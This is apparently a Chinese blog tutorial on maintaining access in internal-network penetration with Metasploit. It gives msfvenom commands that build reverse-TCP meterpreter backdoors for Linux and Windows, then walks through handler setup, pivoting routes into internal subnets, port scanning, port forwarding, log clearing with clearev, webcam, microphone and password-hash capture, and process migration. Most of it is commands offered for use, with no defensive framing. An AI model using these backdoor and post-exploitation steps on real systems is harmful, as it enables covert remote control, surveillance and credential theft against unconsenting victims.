内网渗透之权限维持 - MSF

走远了吗. 提交于 2020-02-02 02:45:58
年初九 天公生

0x034 MSF(美少妇)

  • 启动msf msfconsole

    • 先启动msf依赖的postgresql数据库

      • 初始化数据库 msfdb init (要用普通用户)
  • msf路径 /usr/share

  • 制作后门 msfvenom

    • msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名
    • linux示例

      • msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell
    • windows示例

      • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe
  • 远控流程

    • 连接后门

      • 1.制作后门上传到目标机并运行

        • 详见上一条
      • 2.开启msf并进入handle模块

        • use exploit/multi/handler
      • 3.设置payload类型(必须与第一步一致)

        • set payload payload名字
      • 4.设置lhost和lport(与第一步生成的后门一致)

        • set lhost 监听ip
        • set lport 监听端口
      • 5.options查看配置是否正确
      • 6.run运行

        • 进入meterpreter控制终端

          • 执行shell可进入目标机终端
          • run可执行自带脚本或post模块

            • 自带脚本文件在/usr/share/metasploit-framework/script
            • post模块在/usr/share/metasploit-framework/modules/post
      • bg将进程放到后台,sessions查看,sessions 进程id 返回到进程

    • 添加内网路由
      (被控制的目标机只能访问外网不能访问内网,给它添加路由以访问内网)

      • 1.连接上shell之后运行脚本 run get_local_subnets
      • 2.run autoroute -s 内网网段 #例如192.168.223.0/24
      • 3.run autoroute -p
    • 内网扫描

      • 1.用bg把进程放到后台,打开扫描端口模块

        • use auxiliary/scanner/portscan/tcp
      • 2.设置主机段

        • set rhosts 内网网段 (和上一小节一样)
      • 3.设置扫描端口

        • set ports 端口1,端口2
      • 4.设置线程

        • set threads 线程数
      • 5.run 执行脚本
      • back 退出当前模块

    • 端口转发

      • Portfwd
    • 常用命令

      • 核心命令

        • bg
        • sessions
        • load

          • 和use一样
        • run

      • 文件操作

        • cat
        • cd
        • cp
        • dir
        • download
        • upload
        • ls
        • ps
        • search
      • 网络命令

        • if/ipcondig
        • netstat
        • portfwd
        • getproxy
      • 系统命令

        • clearev
        • kill
        • shell
        • powershell
        • sysinfo
      • 用户界面命令

        • screenshot
      • 其他

        • 摄像头

          • 麦克风

            • 密码哈希
    • 进程注入

      • migrate 被注入的进程号
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!